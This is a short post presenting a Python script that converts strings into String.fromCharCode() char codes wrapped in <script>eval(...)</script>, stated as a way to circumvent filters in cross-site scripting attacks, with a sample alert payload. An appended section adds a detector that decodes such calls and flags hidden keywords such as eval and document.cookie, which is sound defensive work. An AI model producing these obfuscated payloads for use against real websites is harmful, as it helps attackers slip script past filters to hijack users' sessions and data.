Python Unicode Converter

This is a quick script I wrote for converting to Unicode and back when using String.fromCharCode() to circumvent filters in cross-site scripting attacks.

[shell]Usage: -auh

Simple tool to convert from ASCII to Unicode and back for use with String.fromCharCode().

arguments:
-h, --help Show this help message and exit.

-a ASCII_STRING Enter the ASCII string for conversion contained within " ". Any " in the string itself must be escaped with a \ or simply use ' instead.

-u UNICODE_CHARS Enter the Unicode values for conversion contained within " ". Script will take comma separated values as well as just spaced.
[/shell]

[python]
#!/usr/bin/env python3

import argparse
import re
import sys


def CharCode(text):
    sys.stdout.write("<script>eval(String.fromCharCode(")
    # Iterate through the string and get the Unicode value for each char.
    # enumerate() supplies the position of the character as count, which we
    # use to decide whether a comma follows the value.
    for count, letter in enumerate(text):
        unicode_value = ord(letter)  # ord() is the built-in that returns the Unicode value of a character
        sys.stdout.write(str(unicode_value))
        if count < len(text) - 1:  # if we are at any value but the last, add a comma after it
            sys.stdout.write(', ')
    sys.stdout.write('))</script>\n')  # new line at the end so it looks tidier in the bash shell


def CharDecode(unicode_chars):
    ASCII_chars = ""
    # re.split() breaks the input on commas and/or whitespace, so "97, 108",
    # "97,108" and "97 108" are all accepted.
    for code in re.split(r'[,\s]+', unicode_chars):
        if not code:  # skip empty pieces left by leading or trailing separators
            continue
        ASCII_chars += chr(int(code))  # chr() is the built-in that converts a Unicode value back to a character
    print("ASCII string is:", ASCII_chars)


if __name__ == "__main__":

    # argparse lets us take input via flags
    parser = argparse.ArgumentParser(description='Simple tool to convert from ASCII to Unicode and back for use with String.fromCharCode().', usage='-auh')
    parser.add_argument("-a", dest="ascii_string", action="store", help='''Enter the ASCII string for conversion contained within " ". Any " in the string itself must be escaped with a \\ or simply use ' instead.''', required=False)
    parser.add_argument("-u", dest="unicode_chars", action="store", help='''Enter the Unicode values for conversion contained within " ". Script will take comma separated values as well as just spaced.''', required=False)

    # parse_args() returns a namespace object, so any user-supplied value can
    # be accessed as args.<dest name>
    args = parser.parse_args()

    if not (args.ascii_string or args.unicode_chars):  # checking to make sure some input is supplied
        parser.error("Input is required! Usage: -a ASCII string, -u Unicode values, -h help.")
    if args.ascii_string:
        CharCode(args.ascii_string)
    if args.unicode_chars:
        CharDecode(args.unicode_chars)
[/python]

Example usage:

[shell]# ./charcode.py -a "alert('hey')"
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 104, 101, 121, 39, 41))</script>[/shell]
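
A filter or log review that matches keywords on the raw request misses output like the above, because the function name only exists once String.fromCharCode() has run. The following is an added example, not part of the original post: it decodes literal char-code calls before keyword matching. The function names, the keyword list and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not from the original post); the first
# carries the post's example output, URL-encoded.
SAMPLE_REQUESTS = [
    "/search?q=%3Cscript%3Eeval(String.fromCharCode(97,%20108,%20101,%20114,"
    "%20116,%2040,%2039,%20104,%20101,%20121,%2039,%2041))%3C/script%3E",
    "/search?q=python+unicode+converter",
    "/docs?q=String.fromCharCode(72,105)",
]

# Assumed keyword list for illustration; a real rule set would be broader.
KEYWORDS = ("alert(", "document.cookie", "<script", "eval(")

# Decimal or 0x-hex literals, length-bounded so oversized input cannot make
# int() raise. Computed arguments (e.g. x+1) are not matched and stay as-is.
_NUM = r"(?:0[xX][0-9a-fA-F]{1,8}|\d{1,10})"
CALL_RE = re.compile(r"String\.fromCharCode\(\s*(%s(?:\s*,\s*%s)*)\s*\)" % (_NUM, _NUM))


def _to_char(token):
    token = token.strip()
    value = int(token, 16) if token.lower().startswith("0x") else int(token)
    return chr(value & 0xFFFF)  # fromCharCode truncates each argument to 16 bits


def decode_fromcharcode(text):
    """Replace each String.fromCharCode(...) call with the string it builds."""
    return CALL_RE.sub(
        lambda m: "".join(_to_char(t) for t in m.group(1).split(",")), text)


def hidden_keywords(request):
    """Return keywords that are visible only after the char codes are decoded."""
    raw = unquote_plus(request)
    decoded = decode_fromcharcode(raw).lower()
    return [k for k in KEYWORDS if k in decoded and k not in raw.lower()]


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        hits = hidden_keywords(line)
        print("FLAG" if hits else "ok  ", hits, decode_fromcharcode(unquote_plus(line)))
```

The third sample shows that a benign String.fromCharCode() call decodes cleanly and is not flagged, so the check keys on what the call hides, not on the call itself.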
